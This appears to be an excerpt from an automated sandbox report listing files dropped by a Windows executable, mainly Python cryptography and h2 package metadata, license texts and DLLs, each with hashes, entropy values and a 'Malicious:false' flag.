                                                                                                                                                                                                                                                                              Preview:cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-311.pyc,,..cryptography/__pycache__/__init__.cpython-311.pyc,,..cryptography/__pycache__/exceptions.cpython-311.pyc,,..cryptography/__pycache__/fernet
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):94
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0373614967294325
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
                                                                                                                                                                                                                                                                              MD5:A868F93FCF51C4F1C25658D54F994349
                                                                                                                                                                                                                                                                              SHA1:535C88A10911673DEABB7889D365E81729E483A6
                                                                                                                                                                                                                                                                              SHA-256:1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
                                                                                                                                                                                                                                                                              SHA-512:EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):197
                                                                                                                                                                                                                                                                              Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                                                              MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                                              SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                                              SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                                              SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11360
                                                                                                                                                                                                                                                                              Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                                                              MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                                                              SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                                                              SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                                                              SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1532
                                                                                                                                                                                                                                                                              Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                                                              MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                                                              SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                                                              SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                                                              SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):8292864
                                                                                                                                                                                                                                                                              Entropy (8bit):6.493076254122072
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:98304:Y4sf3zg+qUuQdPJMqYLSxuBLZqwt0kDO+5+O:cdeqYLSxuBLZrGjq+
                                                                                                                                                                                                                                                                              MD5:34293B976DA366D83C12D8EE05DE7B03
                                                                                                                                                                                                                                                                              SHA1:82B8EB434C26FCC3A5D9673C9B93663C0FF9BF15
                                                                                                                                                                                                                                                                              SHA-256:A2285C3F2F7E63BA8A17AB5D0A302740E6ADF7E608E0707A7737C1EC3BD8CECC
                                                                                                                                                                                                                                                                              SHA-512:0807EC7515186F0A989BB667150A84FF3BEBCC248625597BA0BE3C6F07AD60D70CF8A3F65191436EC16042F446D4248BF92FCD02212E459405948DB10F078B8E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1102
                                                                                                                                                                                                                                                                              Entropy (8bit):5.120351253767657
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:bOLRrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:bOLRaJHlxE35QHOs5exm3ogF5n
                                                                                                                                                                                                                                                                              MD5:AA3B9B4395563DD427BE5F022EC321C1
                                                                                                                                                                                                                                                                              SHA1:80129BCE9030CF215FC93006DCE98B0BA8C778F8
                                                                                                                                                                                                                                                                              SHA-256:7A65A5AF0CBABF1C16251C7C6B2B7CB46D16A7222E79975B9B61FCD66A2E3F28
                                                                                                                                                                                                                                                                              SHA-512:62337AD684E4AA1192DBA00503EED316F28F6480ACEA90442774BE544C970C3F9012933B451C036DB3AC388C495153D6C9FA04E1844E0A483E8E767218B90690
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:The MIT License (MIT)..Copyright (c) 2015-2020 Cory Benfield and contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3583
                                                                                                                                                                                                                                                                              Entropy (8bit):4.978673419311688
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:D7evWamPktjxsxMMrgfHcxfS+UvWQH46o1WvUXCR:+RsMCgfGfS+UvW63MyR
                                                                                                                                                                                                                                                                              MD5:566784A778E8B69F205F14DAC1D57817
                                                                                                                                                                                                                                                                              SHA1:B1B850F3D43CC453086BED7034675426F81C9BDE
                                                                                                                                                                                                                                                                              SHA-256:C504EAA29585F6BDD95644FEC420C7016599401DE0FF3CAA80AC429748A847A4
                                                                                                                                                                                                                                                                              SHA-512:CFD127A2868E94E5F4FAFAB78A3153094D45F6538AE77642ADE9FABC5580D47DA2EC40A2EB7BF11FD6F5A21553A4489F5278B76AC017D738B64C4C9579B38D55
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: h2.Version: 4.1.0.Summary: HTTP/2 State-Machine based protocol implementation.Home-page: https://github.com/python-hyper/h2.Author: Cory Benfield.Author-email: cory@lukasa.co.uk.License: MIT License.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Requires-Python: >=3.6.1.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: hyperframe (<7,>=6.0).
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                                                                                                                              Entropy (8bit):5.821419256958962
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:pnuXipSpe7lLCDHpks2hT429PTW/2B7V0Wh85dGlLt4qYt29tw:sXEFgH6hT42VTW/2tV0MmdGlLtnY89m
                                                                                                                                                                                                                                                                              MD5:60608F300F680A44E19E60188CFB1274
                                                                                                                                                                                                                                                                              SHA1:56CFF7648824FCFAC20DE09BF76A8D4CBD32A42A
                                                                                                                                                                                                                                                                              SHA-256:A38FC50F66CFA01BED1E2D81F6778ECE33FAF9729E12381B31DCAB8AB1C6A26B
                                                                                                                                                                                                                                                                              SHA-512:C7DF7F333243F3B868160B814ACF04C4CC1CEC772E62B06282DD8E24AC873DAD569F4456A2D003D8F1BEC9AE74875C725E3910F62BF2B61101D86029C4E36BAB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:h2-4.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..h2-4.1.0.dist-info/LICENSE,sha256=emWlrwy6vxwWJRx8ayt8tG0WpyIueZdbm2H81mouPyg,1102..h2-4.1.0.dist-info/METADATA,sha256=xQTqopWF9r3ZVkT-xCDHAWWZQB3g_zyqgKxCl0ioR6Q,3583..h2-4.1.0.dist-info/RECORD,,..h2-4.1.0.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92..h2-4.1.0.dist-info/top_level.txt,sha256=Hiulx8KxI2jFUM1dG7-CZeRkO3j50MBwCLG36Vrq-kI,3..h2/__init__.py,sha256=inV-bCAUhD_QGjQe5Mk8gl7F85v26UW9W3BHov9vBAA,86..h2/__pycache__/__init__.cpython-311.pyc,,..h2/__pycache__/config.cpython-311.pyc,,..h2/__pycache__/connection.cpython-311.pyc,,..h2/__pycache__/errors.cpython-311.pyc,,..h2/__pycache__/events.cpython-311.pyc,,..h2/__pycache__/exceptions.cpython-311.pyc,,..h2/__pycache__/frame_buffer.cpython-311.pyc,,..h2/__pycache__/settings.cpython-311.pyc,,..h2/__pycache__/stream.cpython-311.pyc,,..h2/__pycache__/utilities.cpython-311.pyc,,..h2/__pycache__/windows.cpython-311.pyc,,..h2/config
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                                                                              Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViHoKKjP+tPCCfA5S:RtBMwlViQWBBf
                                                                                                                                                                                                                                                                              MD5:11AA48DBE7E7CC631B11DD66DC493AEB
                                                                                                                                                                                                                                                                              SHA1:249FDB01AD3E3F71356E33E1897D06F23CFB20C2
                                                                                                                                                                                                                                                                              SHA-256:3AA464174798E461ECB0CA2B16395B4C8AB4EF6BE91E917AD1F21003A952F710
                                                                                                                                                                                                                                                                              SHA-512:EDD5892C9B2FE1F2439C53D2CD05F4478EC360885054BD06AFCF7936F6D066377FEE07796DAE9ECDF810E3D6100E039CAD48F00AD0E3145693D53E844CC5319D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3
                                                                                                                                                                                                                                                                              Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Vn:V
                                                                                                                                                                                                                                                                              MD5:4217C1CE78C1E6BAE73FE12CE19C51D3
                                                                                                                                                                                                                                                                              SHA1:8BA0141FFAA18F4355DB911606B6B283D9BEF1B1
                                                                                                                                                                                                                                                                              SHA-256:1E2BA5C7C2B12368C550CD5D1BBF8265E4643B78F9D0C07008B1B7E95AEAFA42
                                                                                                                                                                                                                                                                              SHA-512:E735248AA6CC62335983C38AC04631F512B1444D3FACD5FE00064F6649D9382CC8A1661BFEF4978156B2BBD93C27FCDFD581416B05EBC91B59FEFD3C51207067
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:h2.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):5209352
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8113605800313595
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:98304:UlAXTY8BwEVQ1qb0Oev71CPwDvt3uFRnCLF:UlAXTY8BFVQ1qAOi1CPwDvt3uFRnCLF
                                                                                                                                                                                                                                                                              MD5:54CA3E6AFCB3C57C7914C0856D779F2A
                                                                                                                                                                                                                                                                              SHA1:E37BE8D92350AA1F9DD3212015DE959FAA58AA2F
                                                                                                                                                                                                                                                                              SHA-256:7AED0BC00D2F0CA0DE95EAA6461327BD2E4543723A6CA443A7E899738B353B5A
                                                                                                                                                                                                                                                                              SHA-512:E8079E9D4BFA253677A669913F8198882C2EAAF9251F11CFA64EED5597C34AB7C267BED3826AD9F0A83675177A7575AF54081852A5A633D999BD13CF873A79E8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):5191960
                                                                                                                                                                                                                                                                              Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                                                              MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                                                              SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                                                              SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                                                              SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):39696
                                                                                                                                                                                                                                                                              Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                                              MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                                              SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                                              SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                                              SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):787224
                                                                                                                                                                                                                                                                              Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                                                              MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                                                              SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                                                              SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                                                              SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                                                                                              Entropy (8bit):5.024031964823461
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:atwEf9apwEHklnwEYCm/tJD19g3+ifpWcqguO:n6PS9J8uA2gu
                                                                                                                                                                                                                                                                              MD5:A33FFBBC2D260A7C2370E69AB5BA4064
                                                                                                                                                                                                                                                                              SHA1:B9D8D5C706A5A516A6F60877792C60795BCD3C90
                                                                                                                                                                                                                                                                              SHA-256:FB9A9F06BD313298934651FD84583FEC6A3D3C78BBCF982E33399B6E6648DD7C
                                                                                                                                                                                                                                                                              SHA-512:74FA21688EEA31DDEC654CFA205F02FE064C225061428982BB0E9E0F0758003440780C9C959864E1660FD729935D34DFD2BAB25B9ED703504DDFF9F5AB9F4D0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):285960
                                                                                                                                                                                                                                                                              Entropy (8bit):5.461065382482897
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:4zxBXiKg54fss7LLiIwUaDfS7DfaNX4mDBGMX0Qv77u:2g8L5wRDfS7Dfmoc0cX77u
                                                                                                                                                                                                                                                                              MD5:B7A9AD530A12FED36FD741152AE5681B
                                                                                                                                                                                                                                                                              SHA1:B7E231D6B54B56C25AEE9FE2D2FD6CE02202FCB0
                                                                                                                                                                                                                                                                              SHA-256:AA2C96DD541A3A97789C3BD5F26C0E236B2DF84658995BF4315F69CC0508A76B
                                                                                                                                                                                                                                                                              SHA-512:3F790A40BF638C2ED64E2D400FE89AD08DAAF4B9FAE98002062BF577D39A089E09A2C8CAA4698B35C4893D5369248BBE709CA52B1314E087E178F666DC1E12D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:MSVC program database ver 7.00, 4096*579 bytes
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3569664
                                                                                                                                                                                                                                                                              Entropy (8bit):3.5032339840174664
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:Czce3qZ3MHby9J1a8HbkLtwFgG1vgFNWFPGJU0CsQCX9vanmI+bFuABqg5FLU:C4F1iby9J1fHw5xJIiVanmv7U
                                                                                                                                                                                                                                                                              MD5:DB3980C377DC1940CA2507933B7E9ACB
                                                                                                                                                                                                                                                                              SHA1:61DE86992BD29D65011C9F4E94A695A204D995CB
                                                                                                                                                                                                                                                                              SHA-256:41BCB2B3DEA321B5DCFA107E8DB8842686B61ADE534F802E00ACDF365EC2B2D7
                                                                                                                                                                                                                                                                              SHA-512:AD2D72EA3A2ACB8EFB02E5E1FB23BF03B32F46C4E077B184716AEC7435D563F3021D7C1A01307E0CD37EB1A5B6237F08213F8D454B62293060F2599C9E303B90
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):67072
                                                                                                                                                                                                                                                                              Entropy (8bit):5.909516720609218
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:AGsHmR02IvVxv7WCyKm7c5Th4vBHTOvyyaZE:AYIvryCyKx5Th4v5OvyyO
                                                                                                                                                                                                                                                                              MD5:7A9632D241AD8B97BB50E8EF6DAC1CA6
                                                                                                                                                                                                                                                                              SHA1:29F0D5DE91A84FA58CF45FD134358254B7DA12ED
                                                                                                                                                                                                                                                                              SHA-256:DD0CCDEECA681645025CA0F562EA45B5B17A1EBFCF1688CD0647A950A2992E2F
                                                                                                                                                                                                                                                                              SHA-512:CA6AE6493961F722C07B2FACF272CAF428FD6BCD51A01C34271A18C5D898409C400E50BBAAB2771CBDC94B20041668BE8137242995C9096E511F635F1EA80BB9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):199448
                                                                                                                                                                                                                                                                              Entropy (8bit):6.367371798703565
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:VK/lLDYZL1p13eiG7eDT9AmNfLVuOgOgOgOgOgOgNltwZSm:VglkZHLVuOgOgOgOgOgOgN0sm
                                                                                                                                                                                                                                                                              MD5:79561BC9F70383F8AE073802A321ADFB
                                                                                                                                                                                                                                                                              SHA1:5F378F47888E5092598C20C56827419D9F480FA7
                                                                                                                                                                                                                                                                              SHA-256:C7C7564F7F874FB660A46384980A2CF28BC3E245CA83628A197CCF861EAB5560
                                                                                                                                                                                                                                                                              SHA-512:476C839F544B730C5B133E2AE08112144CAC07B6DFB8332535058F5CBF54CE7ED4A72EFB38E6D56007AE755694B05E81E247D0A10210C993376484A057F2217C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):67352
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1463412690318515
                                                                                                                                                                                                                                                                              Encrypted:false
